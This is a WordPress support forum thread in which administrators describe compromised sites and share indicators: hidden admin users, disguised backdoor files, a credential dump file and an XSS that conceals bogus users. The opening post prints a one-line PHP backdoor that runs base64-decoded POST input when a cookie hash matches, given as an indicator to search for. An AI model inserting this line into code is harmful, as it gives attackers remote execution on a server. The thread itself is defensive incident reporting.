Support » Fixing WordPress » Security issue, multiple sites

  • This issue actually involves several sites, running versions 2.1.3, 2.3, 2.3.1, 2.3.2, 2.3.3 and 2.5

    A couple of the sites had wp-content/uploads writable so they could upload images for use in posts, and files in wp-content/themes writable so they could make theme updates from inside WP.

    Back in early March, I found that several sites had been hit with the ro8kfbsmag.txt hack as mentioned in several threads here, and I’d cleaned those up and upgraded to 2.3.3, since 2.5 wasn’t yet available as a release.

    This past weekend, I discovered several of those sites plus a few additional ones, including 2 brand new sites with 2.5 installed, had many of their files in the writable directories compromised, a bunch of suspicious files uploaded, and database modifications that I cannot explain.

    I’m still trying to unravel the mess and clean it up, but here’s a rundown of tell-tale signs I’ve found.

    Check any .php file for this code added to the top of the file:
    <?php if(md5($_COOKIE['_wp_debugger'])=="--hash excised--"){ eval(base64_decode($_POST['file'])); exit; } ?>

    See if there are any files in writable directories that have the same named as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on. Haven’t yet figured out where or how that info is sent to anyone.

    I can send a copy of the script to anyone in WP security if needed, but I don’t know if this kind of thing is preferred to be attached, inline, or zipped, or anything.

    Also see if there’s a wp-info.txt file anywhere in your hierarchy. This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

    One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

    So I’ve asked all the users on those sites to update their passwords, even if they’d just changed them after the ro8kfbsmag hack, but I have to wonder if I missed anything when cleaning up after that hack that they used to continue to get in and do the more widespread and scary stuff of planting of these new scripts to collect system info.

    As far as I can tell, some of these sites may have been compromised for as long as a month, but all of the added files I’ve listed here were added on Apr 10 and Apr 11, except for one site that seems to have had those changes made on Apr 5.

    I am in the process of changing the DB passwords on those sites, and deleting the new “WordPress” user, but any insight on where this might have started would be welcomed. This new user also happened on sites ranging from 2.1 to 2.3 to 2.5

    What I don’t know yet is if one site was the “in” door, and the rest were compromised by the one script, or if the sites were individually hacked the same way.

Viewing 8 replies - 46 through 53 (of 53 total)
  • Hi. Sorry for waking up an old thread. I’ve just found that that a pre-historic version of wordpress I had online had been compromised too.

    The issue I am seeing is that WordPress 2.7 and even the svn trunk still have the XSS vulnerability that makes the bogus ‘WordPress’ user disappear from the user list. Maybe it doesn’t let users with <script> tags on their names to be created anymore, but the bogus users on the database that were created before the upgrade are still there, but they don’t appear on the user list.

    Where should a security issue like this be reported?

    You can report security issues at

    or via email to:

    security [at]

    Also note that Maximum Security for WordPress helps keep WordPress secure – it helps stop cross-site scripting (XSS) attacks, helps lock down user accounts, and a lot more.

    Bump! Exact same thing happend to my blog on january 29th … WordPress version 2.7.

    Had a strange plugin (renamed plugin file filled with encrypted (?) php code) in the wp_options table (row with option_name active_plugins) and two new users with admin rights which were not visible in the profile section.

    Suggested fix:
    – wordpress should check for strange new users it doesn’t or can’t display
    – wordpress should check if activated plugins really are plugins
    – find the leak and finally fix it 😉

    To clarify, I noticed the hack today, but the date on the malicious php-files was january 29th. This date is also consistent with the massive drop in visitors coming from google since then.

    2.7.1 addresses XSS attacks

    hopefully this is a useful general security guide too, for casual passer-bys wanting more security…

    Video How-to: 10 Tips To Make WordPress Hack-Proof

    I have several blogs but recently I noticed a popup that is not coming from anything I have done on one of my site. I am wondering what can be done to find and clean this up ? or a plugin etc that will remediate this ? here is my site.
    Thanks everyone.

    I’ve just discovered this virus on my blogs.

    In case it’s of any use to anyone, I thought I’d mention that I found some javascript in the usermeta tables which I think might be inserting the user ‘wordpress’.


Viewing 8 replies - 46 through 53 (of 53 total)
  • The topic ‘Security issue, multiple sites’ is closed to new replies.